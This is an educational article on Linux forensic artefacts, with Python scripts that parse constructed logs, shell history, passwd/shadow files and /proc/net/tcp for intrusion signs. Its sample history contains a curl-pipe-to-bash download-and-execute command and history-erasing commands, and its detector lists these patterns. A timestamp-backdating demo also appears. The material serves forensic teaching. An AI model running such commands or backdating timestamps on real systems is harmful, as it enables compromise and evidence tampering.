Top 10 forensic artefacts and data sources on Linux

🎓 MCSI Certified DFIR Specialist 🎓

💻🔎 Linux Forensics 🔎💻

💻🔎 MCSI Digital Forensics Library 🔎💻

Linux forensics is the process of identifying, extracting and analysing data from a Linux system to establish the cause and scope of a security incident. It is used to find evidence of intrusion, malware or other malicious activity. Doing it well requires a solid understanding of the Linux operating system and where it stores data, together with the tools and techniques used to extract and analyse that data.

In this video, we will discuss common locations within a Linux environment where you can identify artefacts to aid your investigation. These include:

🔎 System Information
Hostname, kernel and distribution version (uname -a, /etc/os-release), timezone, uptime and boot time, mounted filesystems and the installed package list establish what the system was and when it was running. This baseline lets you interpret every other timestamp correctly and spot a kernel, module or package that does not match what was expected.

🔎 /var/log
The /var/log directory is the usual location for log files on Linux systems. Key files include auth.log (Debian/Ubuntu) or secure (RHEL family) for authentication, sudo and SSH activity; syslog or messages for general system events; kern.log for kernel messages; and the binary wtmp, btmp and lastlog files that record logins, failed logins and last-login times. Application servers also log here: for example, the Apache web server writes access and error logs that show who requested which resources and when. On systemd hosts the journal under /var/log/journal is binary and is read with journalctl. Keep in mind that these files are writable by root, so an intruder with that privilege can truncate or edit them; gaps and out-of-order timestamps are themselves worth noting.
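As an added example (not from the video or MCSI material), the script below parses a constructed excerpt of auth.log-style sshd lines and flags a source address that succeeded only after repeated failures, which is the pattern of a password-guessing attack that worked. The log lines, host name, IPs and PIDs are made up; the regular expression targets the standard OpenSSH "Accepted ... for ... from" and "Failed ... for ... from" messages.

```python
import re
from collections import defaultdict

# Constructed sample of the syslog-style lines found in /var/log/auth.log (Debian/Ubuntu)
# or /var/log/secure (RHEL family). Hosts, IPs and PIDs are made up for this example.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:02 web01 sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Mar  3 10:01:05 web01 sshd[2203]: Failed password for root from 198.51.100.7 port 51030 ssh2
Mar  3 10:01:09 web01 sshd[2205]: Failed password for root from 198.51.100.7 port 51041 ssh2
Mar  3 10:01:14 web01 sshd[2207]: Accepted password for root from 198.51.100.7 port 51055 ssh2
Mar  3 10:07:41 web01 sshd[2290]: Accepted publickey for deploy from 203.0.113.10 port 40122 ssh2: ED25519 SHA256:c0ffee
Mar  3 10:09:00 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
"""

# Matches OpenSSH's authentication outcome messages; "invalid user" appears when the account does not exist.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def parse_sshd_events(text):
    """Extract sshd authentication outcomes; other lines (sudo, cron, su) are ignored here."""
    return [m.groupdict() for m in map(SSHD_RE.match, text.splitlines()) if m]


def bruteforce_then_success(events, threshold=3):
    """Return (ip, user, failures_before) for logins that succeeded after >= threshold
    failures from the same source IP. Events must be in log order, which is how the file is written."""
    failures = defaultdict(int)
    hits = []
    for ev in events:
        if ev["result"] == "Failed":
            failures[ev["ip"]] += 1
        elif failures[ev["ip"]] >= threshold:
            hits.append((ev["ip"], ev["user"], failures[ev["ip"]]))
    return hits


if __name__ == "__main__":
    evs = parse_sshd_events(SAMPLE_AUTH_LOG)
    for ip, user, n in bruteforce_then_success(evs):
        print(f"{ip} logged in as {user} after {n} failed attempts")
```

On a real host, rotated files (auth.log.1, auth.log.2.gz) must be read as well, and the syslog timestamp carries no year, so it has to be inferred from file modification times or the journal.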

🔎 Shell History
Each user's shell history (~/.bash_history for bash, ~/.zsh_history for zsh) records commands entered at the command line and gives investigators a direct view of what a user, or an attacker using that account, did. Suspicious commands, or commands run unusually often, are a red flag, and the history also shows how a user normally works with the system, which helps separate routine activity from the intrusion. Some caveats: bash only writes the file when the shell exits, so a session that is still open or was killed leaves nothing; the file has no timestamps unless HISTTIMEFORMAT was set; and an attacker can disable or erase it (unset HISTFILE, history -c, or simply deleting the file). A missing or suspiciously short history file is itself an indicator.
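The following is an added example, not code from the video: it parses a constructed bash history written with HISTTIMEFORMAT enabled (each command preceded by a "#<epoch>" line) and flags commands that matter in an intrusion, including the anti-forensic ones that try to erase the history itself. The commands, timestamps and the IP address are invented; the indicator patterns are a small hand-picked set, not an exhaustive list.

```python
import re

# Constructed ~/.bash_history written with HISTTIMEFORMAT set, so each command is preceded
# by a "#<epoch>" line. Commands and timestamps are made up for this example.
SAMPLE_HISTORY = """\
#1709460062
ls -la /var/www
#1709460090
curl -s http://203.0.113.44/x.sh | bash
#1709460130
chmod u+s /tmp/.x
#1709460170
unset HISTFILE
#1709460200
history -c
"""

# Hand-picked indicators; extend for your environment.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download-and-execute"),
    (re.compile(r"\bchmod\b.*\+s\b"), "setuid bit added"),
    (re.compile(r"\bunset\s+HISTFILE\b|\bHISTFILE=/dev/null\b|\bhistory\s+-c\b"), "history anti-forensics"),
]


def parse_history(text):
    """Return (epoch_or_None, command) pairs. Without HISTTIMEFORMAT there are no
    '#<epoch>' lines and the timestamp stays None, so order is all you have."""
    entries, ts = [], None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            ts = int(line[1:])
        elif line.strip():
            entries.append((ts, line))
            ts = None
    return entries


def flag_suspicious(entries):
    """Return (epoch, command, label) for every command matching an indicator (first match wins)."""
    hits = []
    for ts, cmd in entries:
        for rx, label in SUSPICIOUS:
            if rx.search(cmd):
                hits.append((ts, cmd, label))
                break
    return hits


if __name__ == "__main__":
    for ts, cmd, label in flag_suspicious(parse_history(SAMPLE_HISTORY)):
        print(ts, label, "->", cmd)
```

Run it against the real file with `parse_history(open("/home/alice/.bash_history").read())`; because bash appends at exit, also check whether the file's mtime is older than the user's last login in wtmp, which suggests the history was never flushed or was removed.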

🔎 Filesystem
The filesystem records, for every file, an owner, group and permission bits, and three timestamps: last access (atime), last content modification (mtime) and last inode change (ctime). Ext4 also stores a creation time (crtime), exposed through statx and newer versions of stat(1). Together these let investigators build a timeline of what was created, modified or accessed and which users could reach those files. Two caveats: most systems mount with relatime or noatime, so atime is only a rough guide; and atime and mtime can be set freely by the file's owner with touch or utime(), while ctime cannot, because the kernel updates it on that very call, so an mtime far older than ctime deserves a closer look. File metadata and magic bytes also identify a file's real type regardless of its extension, which helps decide whether it is relevant.
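As an added example (not from the video), this script creates a temporary file, back-dates its mtime and atime the way `touch -d` would, and shows that ctime moves forward rather than back. It assumes a Linux (or other POSIX) filesystem where st_ctime is the inode change time; on Windows that field means creation time and the demonstration does not apply. The "timestomp" heuristic at the end is only a pointer to files worth corroborating, not proof of tampering.

```python
import os
import tempfile
import time


def stat_times(path):
    """Return the three POSIX timestamps Linux keeps for a file (st_ctime is inode change time here)."""
    st = os.stat(path)
    return {"atime": st.st_atime, "mtime": st.st_mtime, "ctime": st.st_ctime}


def demonstrate_timestomp(backdated_epoch=1262304000):
    """Create a file, back-date mtime/atime with utime(2), and return (before, after) timestamps.
    utime() lets the owner rewrite atime and mtime freely, but the kernel sets ctime to 'now'
    on that very call; that is the inconsistency an examiner looks for.
    The default epoch is 2010-01-01T00:00:00Z, chosen arbitrarily for the demonstration."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "evidence.txt")
        with open(path, "w") as f:
            f.write("constructed sample content\n")
        before = stat_times(path)
        time.sleep(1.1)  # let ctime advance even on filesystems with 1 s timestamp granularity
        os.utime(path, (backdated_epoch, backdated_epoch))  # same effect as `touch -d 2010-01-01 file`
        after = stat_times(path)
    return before, after


def mtime_predates_ctime(times, slack_seconds=5):
    """Heuristic: an mtime well older than ctime means either the content timestamp was rewritten
    after the last inode change, or the inode was touched later (chmod, chown, rename).
    Corroborate with other artefacts (logs, package manifests, crtime) before concluding."""
    return times["mtime"] < times["ctime"] - slack_seconds


if __name__ == "__main__":
    before, after = demonstrate_timestomp()
    print("before:", before)
    print("after: ", after)
    print("looks timestomped:", mtime_predates_ctime(after))
```

For a whole filesystem, run stat_times over a walk of the tree (or use a tool that emits a body file) and sort by each timestamp separately; a tree where many files share an identical round-number mtime but scattered ctimes is the typical footprint of a bulk touch.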

🔎 User Accounts
On Linux, user accounts are defined in /etc/passwd (name, UID, home directory, login shell), /etc/shadow (password hashes and password ageing), /etc/group and the sudoers configuration. Together with each user's home directory, including ~/.ssh/authorized_keys, these tell investigators who could log in, who could become root, and whose credentials were used. Review them for accounts added or modified around the time of the incident, extra UID 0 accounts, empty password fields, system accounts given an interactive shell, and unexpected SSH keys; these are the usual ways an intruder keeps access, and they point back to the account whose credentials were abused.
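The following added example (not from the video) parses constructed /etc/passwd and /etc/shadow excerpts and reports the three account-level findings most worth a second look: a second UID 0 account, an empty password field, and a system account with an interactive shell. The account names, UIDs and hash strings are placeholders; the set of "no login" shells is the common one and may need extending for a given distribution.

```python
# Constructed /etc/passwd and /etc/shadow excerpts; the hashes are placeholders, not real.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup2:x:0:0:backup:/var/backups:/bin/bash
svc-log:x:1001:1001::/var/log:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$placeholder$placeholderhash:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
games:*:19700:0:99999:7:::
sshd:*:19700:0:99999:7:::
alice:$6$placeholder$placeholderhash:19700:0:99999:7:::
backup2:$6$placeholder$placeholderhash:19785:0:99999:7:::
svc-log::19785:0:99999:7:::
"""

# Shells that refuse interactive login; extend for your distribution.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; the GECOS field may itself contain colons only in the last position, so split on 6."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def parse_shadow(text):
    """Parse shadow(5) lines; field 2 is the hash ('*' or '!' = locked, '' = no password), field 3 is days since 1970-01-01 of the last change."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        entries[f[0]] = {"hash": f[1], "lastchange_days": int(f[2]) if f[2] else None}
    return entries


def audit_accounts(users, shadow):
    """Return (account, finding) pairs in passwd order."""
    findings = []
    for u in users:
        s = shadow.get(u["name"], {})
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "UID 0 account other than root"))
        if s.get("hash") == "":
            findings.append((u["name"], "empty password field in /etc/shadow: login without a password"))
        if 0 < u["uid"] < 1000 and u["shell"] not in NOLOGIN_SHELLS:
            findings.append((u["name"], "system account with an interactive shell"))
    return findings


if __name__ == "__main__":
    for name, what in audit_accounts(parse_passwd(SAMPLE_PASSWD), parse_shadow(SAMPLE_SHADOW)):
        print(f"{name}: {what}")
```

Sorting accounts by lastchange_days, or comparing the mtime of /etc/passwd and /etc/shadow with the incident window, is a cheap way to find which accounts were created or had their password reset by the intruder.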

🔎 Application Data
Application data covers everything from application-specific log files and error messages to user preferences, caches and saved state, typically under ~/.config, ~/.cache and ~/.local/share for users and /var/lib for system services. Browser profiles, database files, package manager databases and editor or client histories are common examples. This data helps establish how the system was used and, in some cases, lets an investigator reconstruct what happened on it.

🔎 Networking
Network configuration and state are recorded in files such as /etc/hosts, /etc/resolv.conf and the interface configuration, in firewall rules (iptables or nftables), and on a live system in /proc/net (for example /proc/net/tcp and /proc/net/udp) or the output of ss -tunap. Service logs and any packet captures add the history of what the host talked to. Where a service's TLS private key is recovered from disk it can decrypt captured traffic to that service only if the sessions did not use forward secrecy; otherwise the session keys exist only in memory and must be captured from the live system.
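As an added example (not from the video), the script below decodes a constructed /proc/net/tcp listing into readable endpoints and separates listeners from outbound connections. The kernel prints each address as a 32-bit value in host byte order, so on little-endian CPUs (x86, most ARM) the octets appear reversed; the decoder assumes little-endian. The rows, addresses, UIDs and inodes are made up.

```python
import socket
import struct

# Constructed /proc/net/tcp content in the layout the kernel emits. Addresses and inodes are made up.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18312 1 0000000000000000 100 0 0 10 0
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 22541 1 0000000000000000 100 0 0 10 0
   2: 0F02000A:0016 076433C6:C4C2 01 00000000:00000000 00:00000000 00000000     0        0 25930 1 0000000000000000 20 4 30 10 -1
   3: 0F02000A:B2E4 0A7100CB:115C 01 00000000:00000000 00:00000000 00000000  1000        0 27110 1 0000000000000000 20 4 30 10 -1
"""

# Socket states as numbered in include/net/tcp_states.h
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
              "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
              "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING"}


def decode_endpoint(field):
    """Turn 'HEXADDR:HEXPORT' into (dotted_ip, port). Assumes a little-endian host."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse every data row; the header row and anything malformed is skipped."""
    conns = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 10 or not f[0].endswith(":") or not f[0][:-1].isdigit():
            continue
        conns.append({
            "local": decode_endpoint(f[1]),
            "remote": decode_endpoint(f[2]),
            "state": TCP_STATES.get(f[3], f[3]),
            "uid": int(f[7]),
            "inode": int(f[9]),  # resolves to a process via /proc/<pid>/fd/* -> socket:[inode]
        })
    return conns


def outbound_connections(conns):
    """Established sockets with a real peer; listeners and wildcard peers are excluded."""
    return [c for c in conns if c["state"] == "ESTABLISHED" and c["remote"][0] != "0.0.0.0"]


if __name__ == "__main__":
    for c in outbound_connections(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP)):
        print(f"uid={c['uid']} {c['local'][0]}:{c['local'][1]} -> {c['remote'][0]}:{c['remote'][1]} inode={c['inode']}")
```

This only exists on a live system (or in a memory image); on a dead disk there is no /proc. To attribute a socket to a process, find which /proc/<pid>/fd entry links to socket:[inode]; a connection owned by an unprivileged UID to an unusual remote port, as in the last sample row, is the kind of thing to chase.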

🔎 Services
Services are defined by systemd unit files (/etc/systemd/system, /lib/systemd/system and per-user units under ~/.config/systemd), legacy /etc/init.d scripts, and scheduled jobs in cron, at and systemd timers. Listing what is enabled and what was actually running (systemctl list-units, ps) shows what the system was doing and who it was serving, and is one of the first places to look for persistence: an unfamiliar unit, a service whose binary lives in /tmp or a home directory, or a cron entry added around the time of the incident.

🔎 External Devices
External devices such as USB drives, memory cards and external hard disks may hold data relevant to the case, and the device itself can be imaged and examined with forensic tools. Just as important, the Linux host keeps evidence that a device was attached: kernel messages ("New USB device found", with vendor and product IDs) in kern.log, syslog or the journal, mount records, and udev activity. These establish when a device was connected, what it was and where it was mounted, which can tie data movement to a person and a time even after the device is gone.

🔎 Remote Connections
Remote connections to and from a Linux system leave traces in several places: SSH logins in auth.log or secure (with source address, user and authentication method), session records in wtmp and btmp (what last and lastb display), ~/.ssh/known_hosts for hosts the user connected to (possibly hashed if HashKnownHosts was on), and ~/.ssh/authorized_keys for keys allowed in. Remote desktop, VNC and VPN services keep their own logs. Correlating these with network state and shell history lets investigators see where an intruder came from, what they did and where they went next, and often surfaces additional hosts or accounts involved that would otherwise have gone unnoticed.